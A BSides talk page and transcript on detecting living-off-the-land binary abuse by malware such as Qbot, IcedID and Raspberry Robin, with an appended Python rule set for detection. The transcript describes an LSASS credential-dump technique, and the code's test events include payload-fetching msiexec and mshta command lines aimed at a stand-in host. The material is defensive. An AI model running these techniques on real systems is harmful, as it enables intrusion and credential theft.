
Misbehaving Binaries: Methods to Detect LOLBin Abuse

BSides KC · 2023 · 34:22 · 2.0K views · Published 2023-10
Category: Technical
Style: Talk
About this talk
Are you struggling to keep up with false positive alerts? Worried the alerts you ingest will never catch true evil? Are you responding to malicious activity well after it occurs, rather than detecting it in real time? If you answered "yes" to any of the above, this discussion is for you. Through this talk, attendees will be equipped with a trusted process to more effectively detect malicious activity in their environment. Focusing on system binaries that frequently facilitate the download or execution of malicious code (rundll32.exe, msiexec.exe, regsvr32.exe, etc.), publicly available resources will be leveraged to determine normal behavior versus malicious behavior. We'll walk through how to answer questions such as: what are normal command line parameters, process paths, and process lineages? Should this binary be making network connections? What are known abuse techniques of this binary? We'll then dive into a handful of options for creating effective detection logic. Delving into examples of real-world threats and techniques often utilized by red teams (e.g., search order hijacking, process injection, privilege escalation), these detection ideas will allow defenders to create alerts that have more meaning and a higher true positive rate.

Outline:
- Intro - What are LOLBins? Discuss commonly used system binaries to download or execute malicious code: rundll32, regsvr32, msiexec, mshta, msbuild.
- Gather information - What is normal? Process path, network connections, typical command line, process lineage. How can this binary be abused? Use findings to explore detection options.
- Detect the evil - What real threats should this be catching? Example activity from threats such as Qbot, Raspberry Robin, and SocGholish. Potential to also catch widespread tactics utilized by many threats and red teams: search order hijacking, process injection, privilege escalation.
Transcript [en]

Thank you. Yeah, so today we're going to be talking about weird binary behavior, you know, what to look for. I am Rachel Schwalk. I am a detection engineer at Red Canary, so I make detectors and hunt for evil across a very wide variety of environments. I got my start working as an analyst on a cyber incident response team, and I got to admin a wide variety of security tools and wear a lot of hats. In my free time I enjoy reading, puzzles, Legos, and good food.

So what are LOLBins? It stands for living-off-the-land binaries. These are binaries that are either downloaded from Microsoft or they're already native in the operating system; usually they're already native in the operating system. So today, on those binaries, you know, if you're still confused, think of Notepad or Excel; those are Microsoft binaries that you can find. Today I'll be talking more about default binaries that can be used to download or execute malicious code. Usually PowerShell and the scripting engines get a lot of love; I'm going to talk a bit about rundll32, regsvr32, MSBuild, msiexec, mshta, kind of the ones that are maybe the underdogs when comparing them to PowerShell. And if you're wondering how often this is seen in threats: quite a bit. In 2022 alone, over a third of Red Canary malicious and suspicious detections had LOLBins in them, and those weren't ones that were testing, so that's excluding all the testing and the adversary emulation stuff. Those were real threats that contained LOLBins.

So how do you even get started? Well, you're going to have to learn about the binary first. You're going to want to learn, you know, what is this binary supposed to be doing normally, so that way you even know what to expect if it is behaving in a strange manner. So some good sources that are free: I really like EchoTrail, because it gives a summary of what it is, what its normal path is that it should be executing from, what common networking ports this binary makes connections on, what the normal lineage is; really good information to just get a baseline on what is normal for execution. And LOLBAS and the Strontic encyclopedia, the encyclopedia for executables, those both give really good examples of normal and detection logic on what is kind of weird. So it'll give you, oh, you know, if it's proxying execution this is what that looks like, and here are some good detection logic ideas for that. Atomic Red Team is also great for showing how the binary can be abused, how you can actually test in your own environment for that method of abuse and see if you're actually seeing what you expect to when you build out your logic. And then also a shout-out for the Red Canary Threat Detection Report, because it'll list the binaries and also show what malware families we see using these binaries. There are plenty of other ones out there, but just kind of getting started, those are good resources.

So now we have our sources; we're going to try to gather what is normal. So kind of keep in mind when you're looking through this information: what does this binary do, what is the normal process path, should this binary be making network connections, and if it does, should it be making external network connections, should it be, you know, only maybe reaching out to Microsoft if it's an external connection, and what are the typical command line parameters. Keep in mind, if it always executes with a command line, that's something to look for, or if it never has command line parameters. And if you by chance get a consistent parent or child lineage, that's also pretty helpful. There's a couple out there, like svchost will typically be executed by services, and so that can also help for some detection ideas.

And after you kind of baseline normal, you're going to look for how this binary can be abused. So you're going to identify abnormal activity and then look at kind of what malware families are doing to abuse that binary. So some examples that I put here, not relating to any specific binary yet: downloading things from a remote resource is pretty abnormal, executing with an unexpected command line or maybe no command line at all, proxying execution through another process, executing maybe from a really random folder instead of System32, and misuse of a legitimate function; I'll talk a little bit more about that in a minute. And then you can look at, okay, I'm going to look at specific threat families and see what they're doing, and maybe they're injecting into the process and spawning reconnaissance commands, or maybe the system binary is being executed by a Microsoft Office binary, and renamed and relocated system utilities. This one can really help if you get that metadata of a binary, so that way you can see, you know, if cmd is renamed to utilman, that's something you could pick up just based on that internal naming scheme of the binary.

All right, so now I'm going to walk through an example. I like rundll32; it's used a lot by various different threats. So what is rundll32 in the first place? It enables the execution of dynamic link libraries, so basically little code functions that different processes can call, and it typically executes out of System32, or SysWOW64 if it's a 32-bit system. And according to EchoTrail its most common parents are svchost, explorer, rundll32, and spoolsv; it's not an exhaustive list, though, rundll32 can have quite a few different parents normally. Its most common children are going to be rundll32, WinSAT, and dfsvc, but also not an exhaustive list there. It has been observed making network connections, but typically only on 443 and 80, and usually it's going to be to common network connections or internal network connections and not so much strange, you know, newly created domains. And it also executes with a command line, so it's not one of those that executes without one. It typically will look like rundll32 with the DLL name and DLL function, so it should execute with those parameters under normal circumstances.

All right, so looking at some examples of how rundll32 can be abused. It can abuse legitimate DLLs or export functions to perform malicious actions; in this case it is calling the comsvcs DLL and calling the MiniDump function to dump LSASS, and LSASS has a lot of juicy secrets; it's got, you know, all the credentials on that local host, and so that can be abused to get credentials. It can execute malicious adversary-supplied DLLs, and it can also use other legitimate functions to bypass application control solutions. In this one it is calling the DllRegisterServer function, which normally is used legitimately by regsvr32, because that's the binary responsible for registering DLLs, and so when rundll32, which is supposed to execute DLLs, uses that function, that's something to keep an eye on, because it's a pretty rare thing for it to legitimately do. And in this case it's calling, you know, a text file in the user's Public folder, and so definitely suspect there, with the folder containing a definitely-not-text file. Other abnormalities would be rundll32 executing JavaScript and PowerShell, so this would be proxying execution through those processes, and initiating a download from a remote source. In this example here it's calling JavaScript to then call PowerShell to then download something from a random IP/port combination, so a little bit strange for rundll32 to do that. And then executing a DLL in an alternate data stream is another method that could be abused: you've got this text file that has a DLL referenced inside of it, and then calling the DllMain function to execute it. So it looks, you know, on the surface like it might just be a text file, but it's not. And then you've also got executing without command line parameters; like I said, it should always have the DLL name and DLL function, so when it doesn't, that could be a sign that something's up.

Now, what malware utilizes rundll32? A lot of them, but here are a couple to get us started. So Qbot; you guys might have heard Qbot was taken down recently, but Qbot had been around for a really long time, and so it's still really worth learning its behaviors, and its delivery affiliates, TA570 and TA577, they are still around and delivering other things that could behave similarly to Qbot. And so this is a couple of examples of what that DLL execution looked like for Qbot, where it was calling from that Public Documents folder a random DLL and calling its RS32 function. And so that use of a strange folder and a DLL, very strange behavior, and same with the next one in the ProgramData folder; it's calling a JPEG, which is not a JPEG, and it has just a randomly named function name of Wind. So both of those, you know, Qbot would change its delivery method a lot, but it would usually, like 90% of the time, execute rundll32 with a weird DLL in a weird folder with weird names, and the other 10% was regsvr32.

SocGholish is the next one, and so this is one that takes advantage of compromised WordPress sites and leads people to adversary infrastructure to download a browser update. It tells the user, oh my gosh, you can't continue, your Chrome is so out of date, please update, and so then they get this nice little update.js JavaScript file that then executes rundll32, and that's what this looks like here, also using the ProgramData folder and using that function that I mentioned earlier is used by regsvr32 legitimately, the DllRegisterServer function. Gamaredon is another one that uses rundll32, and I like this one because it kind of looks like Morse code going on here with the dash, dash, underscores, but that is the DLL name; it's not redacted or anything, that is just what the DLL naming scheme is, and it's calling that "wmsm" whatever, that's the function name. And so that's definitely, you know, you see that and you're like, well, something's definitely up there, that's not normal. And IcedID is another one that's been around as a banking trojan; it steals financial information, and it's also a dropper for other malware; it's been seen dropping ransomware before. And it will have this DLL in AppData\Roaming\test and then another subfolder, and what I like about this one is it calls an ordinal value function. So that hashtag, the pound sign, whatever you want to call it, that's the ordinal value for saying the first function, basically, in that DLL, and so that's a way that sometimes adversaries will use to obfuscate what function they're actually calling.

All right, so now we'll move on to kind of what telemetry we can use for good detection opportunities. So I like to use command lines: you know, we have the option for the no command line, we have URLs in command lines, and those known abuse mechanisms present, so like I mentioned, that ordinal value, that's a known abuse mechanism; the DllRegisterServer for rundll32, that's another one. The lineage can be a good one, specifically if you see something spawning reconnaissance commands; that's usually only going to be done by cmd, if recon is really necessary in your environment, so when you see rundll32 or these other binaries spawning it, it's pretty strange. You've got process paths; you know, with rundll32 we said that it should be in System32, so if it's not in there and it's in the Public Documents folder, something to look for. And the network connections, file modifications, the module loads; I like to use those usually as a combination of logic, instead of as the main supporting logic. So if I do something, and maybe no CLI on its own isn't strong enough, and I add no CLI with a network connection, that's usually going to be less prone to false positives.

So here is what I came up with for rundll32, now that we kind of went over what telemetry I usually look at. We'll use that and then say the process path: so if rundll32 executes and it is not in System32 or SysWOW64, that is something I want to look at. If rundll32 executes and it spawns JavaScript, that's something I want to look at. If an MS Office binary, so if Word, spawns rundll32, something else to look at. And we got a ton of them with the command line, because rundll32 does typically use a specific format: so rundll32 with no ".dll" in the command line, like we saw those JPEGs and TXTs that weren't really JPEGs, because rundll32 shouldn't be executing JPEGs, so look for that. But you'll also note with the no ".dll" you'll have to tune a couple things; .cpl and .ocx are sometimes used legitimately, but start with the DLL, and as you need to tune it, don't leave it and let it suffer. And then rundll32 without a command line; we can look at that and say that it might be injected into. Rundll32 with "http" in the command line: it could be trying to download, like we saw earlier with it proxying execution through JavaScript to then download through PowerShell, so look for "http" in the CLI. And then with the rare function in the command line: so look for that pound sign or the DllRegisterServer in the command line when rundll32 is executing.

And apply these ideas to your environment, because like I said, this won't always be 100% true positive for your environment right out of the box. So, you know, if you get something and it's noisy, just tune it out; it should take like two to three tuning sessions, because if you let it be noisy you're not ever going to catch it when it's catching true positive threats. And if you can't do it with just a few exclusions, it's probably not worth detecting in your environment, because if you see that alert day in and day out it's just never going to be of value to you. So, you know, try to think of different ways to make that logic better, and combine logic to be more specific to certain threats if you need to.

So now I'm going to talk about more threats and what LOLBins they use. Raspberry Robin is a fun one. It usually starts through an infected USB; often they've been used in printing and mailing centers, and Raspberry Robin is usually a dropper of other malware; it's been seen dropping SocGholish, it's been seen dropping Cobalt Strike and IcedID, and it likes to use msiexec. So in this case you'll see msiexec executes with this weird camel-case lettering, and it calls with the /Q for quiet so the user doesn't know anything's downloading, and it goes to this website. It's using port 8080, so a little bit abnormal of a port for HTTP traffic, and it has the hostname there; it usually will call also with the username, so it will usually be username/hostname. And if that msiexec network connection is successful, it will download a randomly named DLL, and it'll typically put it in a subdirectory of ProgramData. It also uses rundll32, regsvr32, and dllhost for follow-on C2 activity. And so some detection opportunities for this one would be msiexec with a command line of "http" or "https" and the "/q" or the "-q", and then also you could look for a command line that does not contain a ".msi" or a ".msp", because those are the installer files that msiexec typically will be executing.

IcedID, so we showed it with rundll32 earlier, but it also uses msiexec. And it was earlier this year the DFIR Report posted a really good write-up on an IcedID infection that led to widespread domain spread, completely pwned, Quantum ransomware across the environment in less than 78 hours, so it really moved fast once IcedID dropped, and so you want to catch this one early for sure. And so this one had msiexec spawning systeminfo, but it'll spawn other reconnaissance commands like nltest /domain_trusts or ipconfig, so look for msiexec executing and a child process of systeminfo, ipconfig, net, or nltest. And some other things: it also used rundll32, like we mentioned earlier; this was another example of it calling a .dat file, so that would be caught with rundll32 without a DLL in the command line.

And so this is a fun one: Red Canary has been tracking this fake browser update threat cluster. So SocGholish is the OG one that I mentioned earlier, but recently there have been these other ones come in, like Scarlet Goldfinch and this FakeSG. FakeSG, there's been a write-up, I think Malwarebytes has done the best one, kind of in-depth on what that does, to differentiate it from SocGholish. But basically these first two, they use WScript .js files to redirect people to these browser updates, and it downloads like "browser update" and then a version number ".js", or just "update.js" usually for SocGholish now. And FakeSG, it uses mshta with HTA files, and it has names like a version number ".hta" or "launcher_update.hta", and that's the one I'm going to talk a little bit more about. So FakeSG is really kind of interesting in the fact that it uses forfiles, which is a different LOLBin that you can run a command on a file or pass arguments to multiple files using that. And so forfiles spawned PowerShell, and PowerShell then spawned mshta using those wildcards; it's kind of hard to see there, but it's \Windows\System32\mshta with the little wildcard symbols, and it is calling this compromised WordPress site to download this HTA, and that'll execute. So there are a lot of opportunities with this FakeSG strain: forfiles spawning PowerShell, that's a good detection opportunity there, and then mshta with the command line containing "http" is also a great opportunity to look for; mshta downloading anything is usually pretty strange. And then mshta with a parent of PowerShell is another good detection opportunity for this threat cluster.

Emotet is one that's been around a while, but I haven't seen it a whole lot this year; it mostly kind of tapered off at the end of 2022. But it liked to, you know, disseminate through email attachments, links; it likes to use macro files for Excel, Word. In this case it was Word that then spawned regsvr32, and regsvr32 then also spawned regsvr32 to execute a DLL, and additional activity that isn't shown was that regsvr32 made outbound network connections and spawned systeminfo and ipconfig. So some detection opportunities for this type of threat would be the MS Office binary spawning regsvr32; regsvr32 with the command line containing "appdata" and not containing that ".dll" is another good one; regsvr32 with external network connections, excluding connections to very common external domains like Microsoft domains; and regsvr32 with a child process of systeminfo and ipconfig.

So now I'm going to talk a little bit about testing, because these are real threats, but what do you normally see when people are testing? Is it the same, is it different, and what do red teams usually do; you know, does it hold up? So this is a graph I pulled from the Threat Detection Report, and one that I really enjoyed. It's kind of fuzzy up here, but it does point out that a lot of these LOLBins are tested just as much in real-world threats as they are in test environments. So mshta is a little fuzzy up there, and regsvr32, but regsvr32 is actually used more in real threats than testing, and that last one is credential dumping. So credential dumping is used way more in testing than it was in real threats that we saw, and Windows command shell pretty even, PowerShell's pretty even. So a lot of them were pretty even, but that credential dumping was the one like, dang, that is tested a lot more than it is actually done.

And like I said, red teams love LOLBins; you know, why get all these external binaries on the system when you can just run it and they're less likely to see it? So from my experience I've seen a lot of them do process injection, so look for a binary executing with no CLI and then an external network connection; look for connections to content delivery networks like CloudFront or Fastly, that's used a lot. Dumping LSASS through rundll32 with that MiniDump function, or if you open Task Manager, you find LSASS, you right-click and you hit dump, you've got the LSASS dumped memory right there, so really easy to do. And then scheduled tasks, registry run keys, service execution; these can be used for persistence, obviously, but also privilege escalation, because services will execute under SYSTEM, and you can do the same with scheduled tasks. Process and domain account discovery: so look for, you know, trying to look for the Domain Admins group with the net binary, and local admins, running whoami; that's usually, you know, not enough on its own, but if it's rarely done in your environment, maybe you can get away with looking for it. And suspicious directory execution: so DLL side-loading is pretty common; look for, you know, weird system binaries executing from a Desktop folder or the Public folder, and look for it loading in a DLL in the same folder, because that will usually be the bad DLL. And so that can be used for UAC bypass or just executing malicious code. And you should test your systems with, you know, I'd look for Atomic Red Team and run those tests in your environment, because they're safe to do and you'll know if you will catch it when a real threat comes. That's all I've got, so are there any questions?

Audience: So when you're saying internal network, actually like AD simulation, or...

Rachel: I look at that completely differently. Those adversary emulation tools have a very specific process lineage, and they don't look like somebody hands-on-keyboard. So we really like to look at those net commands spawning; you know, if you're looking for DCs in the domain, we're going to take that a lot more seriously than AttackIQ executing.

Audience: Yeah, where you wouldn't necessarily be stealthy; they'd be using a lot of AD, you know, as a last step.

Rachel: But yeah, and so a lot of that, with their Cobalt Strike beacons, we'll see a lot of times that process injection piece, and what really caught me off guard once was they injected into the OpenWith binary. So we saw OpenWith connecting to CloudFront domains, and I'm like, OpenWith doesn't do that, you know. So I like that; that's good, if they're not using binaries you wouldn't think to even monitor, that's a little bit sneakier. Some red teams are better than others with stealthiness.

Audience: So yeah, the best way to harden, for catching, before they start this behavior?

Rachel: So, you know, you can do several things. Don't give everyone local admin access is a good start. You can try to limit, you know, what files you allow users to execute. Like, for that SocGholish threat and stuff, the .js: if you change the default to open in Notepad instead of WScript, that's a good start, because then the user just opens it and they're like, it's not working, you know; instead of, you know, they don't see it, they would still be like, oh, it's not working, my browser didn't update, but at least you're not compromised at that point. So just changing what, you know, files you allow to execute, maybe what users can execute.

Audience: Yeah, like WScript, PowerShell, maybe not everyone needs to do that, down to the app, what can the app actually do, give forever?

Rachel: Yeah, yeah. And just, basically, you can do app whitelisting with some stuff, or I really just recommend, you know, limiting what users are allowed to execute, like have certain groups that are like, okay, this group is a power user group and they can do this, but other users cannot.

Audience: Yeah, so on the slides, you were talking about running rundll32 called, yeah, I know you had some images, right, are those like... or?

Rachel: So they are not going to be actual images. I was trying to see which one was it; yeah, this Qbot one is one. So they don't try to appear as an image or anything; they just try to appear, like if somebody is looking in the ProgramData folder and they see a JPEG, they're like, okay. But if you open the file properties and you look at, you know, what is the actual extension, then it'll say like DLL, you know, or a PE file, basically.

Audience: ...see that work, Windows really?

Rachel: Yeah, yeah, that Qbot magic; they like to do that with, you know, it wasn't just JPEGs, they would do all kinds of random stuff; they would put just a dot and then just gibberish sometimes and not make it look like a real file extension.

So cool, well, if there's nothing else, thank you guys for listening. [Applause]
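The detection ideas the talk walks through (rundll32 with no ".dll", an ordinal export or DllRegisterServer on the command line, "no command line" combined with an external connection, msiexec with "http" plus /q and no .msi/.msp, mshta with "http" or a PowerShell parent, forfiles spawning PowerShell, Office spawning regsvr32, a LOLBin spawning recon commands) can be expressed as rules over process-start events. The block below is an added example, not the speaker's or Red Canary's code: the event schema, the hostnames, paths and file names, the rule names, the "common external" exclusion list and the .cpl/.ocx tuning list are all assumptions constructed to mirror the behaviours described in the transcript, not real telemetry.

```python
"""LOLBin detection ideas from the talk as rules over process-start events.
Added example, not the speaker's or Red Canary's code; the event schema, hosts,
paths and file names are constructed assumptions modelled on the transcript."""
import re
from dataclasses import dataclass, field

@dataclass
class ProcEvent:
    image: str                                    # full path of the started binary
    cmdline: str = ""                             # full command line, "" = started with none
    parent: str = ""                              # parent image path
    children: list = field(default_factory=list)  # image names this process spawned
    remote: list = field(default_factory=list)    # external hosts it connected to

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("\\users\\public\\", "\\programdata\\", "\\appdata\\", "\\temp\\")
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe"}
RECON = {"systeminfo.exe", "ipconfig.exe", "net.exe", "net1.exe", "nltest.exe", "whoami.exe"}
LOLBINS = {"rundll32.exe", "regsvr32.exe", "msiexec.exe", "mshta.exe", "msbuild.exe"}
RUNDLL_OK_EXT = (".dll", ".cpl", ".ocx")     # .cpl/.ocx are the tuning the talk mentions
COMMON_EXTERNAL = ("microsoft.com", "windowsupdate.com", "live.com")  # assumed exclusions

def _name(path):
    return path.rsplit("\\", 1)[-1].lower()

def _args(cmdline):  # everything after the image token (assumes an unquoted image path)
    return cmdline.partition(" ")[2].strip().lower()

def detect(ev):
    """Return the sorted rule names that fire for one event."""
    n, p, args = _name(ev.image), _name(ev.parent), _args(ev.cmdline)
    children = {c.lower() for c in ev.children}
    external = [h for h in ev.remote if not h.lower().endswith(COMMON_EXTERNAL)]
    hits = []
    if n in LOLBINS:                                   # rules shared by every LOLBin
        if not ev.image.lower().startswith(SYSTEM_DIRS):
            hits.append("lolbin_unexpected_path")
        if p in OFFICE:
            hits.append("office_spawned_lolbin")
        if children & RECON:
            hits.append("lolbin_spawned_recon")
        if not args and external:                      # weak signal + network = stronger
            hits.append("no_cli_with_external_net")
    if n == "rundll32.exe":
        if not args:
            hits.append("rundll32_no_cli")              # candidate for process injection
        else:
            mod = args.split(",", 1)[0].split()[0].strip('"')   # module before ",export"
            if not mod.endswith(RUNDLL_OK_EXT):
                hits.append("rundll32_module_not_dll")  # .jpeg / .txt / .dat "DLLs"
            if any(d in mod for d in USER_WRITABLE):
                hits.append("rundll32_module_in_user_dir")
            if "http" in args:
                hits.append("rundll32_http_in_cli")
            if re.search(r",\s*#\d+", args):
                hits.append("rundll32_ordinal_export")  # ",#1" hides the export name
            if "dllregisterserver" in args:
                hits.append("rundll32_dllregisterserver")
            if "comsvcs" in args and "minidump" in args:
                hits.append("rundll32_comsvcs_minidump")
        if children & SCRIPT_HOSTS:
            hits.append("rundll32_spawned_script_host")
    if n == "msiexec.exe" and args:
        if "http" in args and re.search(r"(?:^|\s)[/-]q", args):
            hits.append("msiexec_quiet_remote_install")
        if not re.search(r"\.ms[ip]\b", args):          # no .msi/.msp installer file
            hits.append("msiexec_no_msi_or_msp")
    if n == "regsvr32.exe":
        if "appdata" in args and ".dll" not in args:
            hits.append("regsvr32_appdata_without_dll")
        if external:
            hits.append("regsvr32_external_net")
    if n == "mshta.exe":
        if "http" in args:
            hits.append("mshta_http_in_cli")
        if p == "powershell.exe":
            hits.append("mshta_parent_powershell")
    if n == "forfiles.exe" and "powershell.exe" in children:
        hits.append("forfiles_spawned_powershell")
    return sorted(hits)

S32 = "C:\\Windows\\System32\\"
SAMPLES = {  # constructed events modelled on the talk's examples, not real telemetry
    "benign_rundll32": ProcEvent(S32 + "rundll32.exe", "rundll32.exe " + S32 + "shell32.dll,Control_RunDLL", "C:\\Windows\\explorer.exe"),
    "qbot_like": ProcEvent(S32 + "rundll32.exe", r"rundll32.exe C:\Users\Public\Documents\abcd.jpeg,Wind", "C:\\Windows\\explorer.exe"),
    "icedid_like": ProcEvent(S32 + "rundll32.exe", r"rundll32.exe C:\Users\u\AppData\Roaming\test\sub\ab.dll,#1", S32 + "cmd.exe"),
    "socgholish_like": ProcEvent(S32 + "rundll32.exe", r"rundll32.exe C:\ProgramData\ab12.dll,DllRegisterServer", S32 + "wscript.exe"),
    "injected_rundll32": ProcEvent(S32 + "rundll32.exe", "rundll32.exe", S32 + "svchost.exe", remote=["d1111abcd.cloudfront.net"]),
    "raspberry_robin_like": ProcEvent(S32 + "msiexec.exe", "MsIeXeC /Q http://example.test:8080/host=user", S32 + "cmd.exe"),
    "benign_msiexec": ProcEvent(S32 + "msiexec.exe", r"msiexec /i C:\Users\u\Downloads\tool.msi /qn", "C:\\Windows\\explorer.exe"),
    "fakesg_like": ProcEvent(S32 + "mshta.exe", "mshta http://example.test/launcher_update.hta", S32 + "WindowsPowerShell\\v1.0\\powershell.exe"),
    "emotet_like": ProcEvent("C:\\Windows\\SysWOW64\\regsvr32.exe", r"regsvr32.exe C:\Users\u\AppData\Local\Temp\ab.dat", "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", children=["systeminfo.exe", "ipconfig.exe"]),
}

def triage():
    """Run every sample through the rules; the two benign events should produce no hits."""
    return {name: detect(ev) for name, ev in SAMPLES.items()}

if __name__ == "__main__":
    for name, hits in triage().items():
        print(f"{name:22s} {hits}")
```

The rules mirror the talk's tuning advice: the weak signals (no command line, a non-system path) stand on their own only as low-severity hits, while the combination rule fires when "no command line" coincides with an external connection, which is the pairing the speaker describes as far less prone to false positives. The .cpl/.ocx allow-list is where the "don't leave it and let it suffer" tuning goes: extend the tuple when a legitimate extension shows up rather than disabling the rule.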